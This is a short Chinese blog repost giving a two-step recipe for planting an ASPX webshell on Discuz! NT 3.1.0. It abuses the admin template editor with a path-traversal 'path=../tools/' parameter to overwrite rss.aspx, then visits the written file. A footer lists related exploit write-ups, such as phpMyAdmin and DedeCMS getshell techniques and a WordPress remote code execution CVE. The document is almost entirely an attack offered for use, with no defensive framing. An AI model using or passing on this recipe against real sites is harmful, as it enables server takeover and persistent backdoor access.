Discuz! NT 3.1.0 后台拿webshell

简介:

 

1、访问http://127.0.0.1/admin/global/global_templatesedit.aspx

?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default,写入aspx木马。
2、写入aspx木马后,访问http://127.0.0.1/tools/rss.aspx就可以了。













本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/581501,如需转载请自行联系原作者

 
相关文章
|
2月前
|
开发框架 安全 应用服务中间件
【文件上传绕过】——解析漏洞_IIS7.0 | IIS7.5 | Nginx的解析漏洞
【文件上传绕过】——解析漏洞_IIS7.0 | IIS7.5 | Nginx的解析漏洞
121 9
|
4月前
|
安全 网络安全 PHP
WordPress PHP Everywhere <= 2.0.3 远程代码执行(CVE-2022-24663)
WordPress PHP Everywhere <= 2.0.3 远程代码执行(CVE-2022-24663)
|
存储 JSON 安全
phpStudy 小皮 Windows面板 RCE漏洞
详情看文章内叙述
269 1
|
SQL 安全 关系型数据库
phpMyAdmin后台Getshell总结
phpMyAdmin后台Getshell总结
355 1
|
Web App开发 XML 安全
DedeCMS存在文件包含漏洞导致后台getshell(CVE-2023-2928)
DedeCMS存在文件包含漏洞导致后台getshell,攻击者可通过该漏洞获取目标服务器控制权限,进行深度利用。
488 1
|
SQL PHP 数据安全/隐私保护
PHP审计-后台绕过登录
PHP审计-后台绕过登录
|
XML Web App开发 安全
DVR登录绕过漏洞&&phpstudy后门rce
DVR登录绕过漏洞&&phpstudy后门rce
DVR登录绕过漏洞&&phpstudy后门rce
|
SQL 安全 关系型数据库
【WEB安全】PHPMyAdmin后台GetShell姿势总结(上)
【WEB安全】PHPMyAdmin后台GetShell姿势总结
534 0
【WEB安全】PHPMyAdmin后台GetShell姿势总结(上)
|
SQL 存储 安全
【WEB安全】PHPMyAdmin后台GetShell姿势总结(下)
【WEB安全】PHPMyAdmin后台GetShell姿势总结
454 0
【WEB安全】PHPMyAdmin后台GetShell姿势总结(下)
|
.NET 数据库 数据安全/隐私保护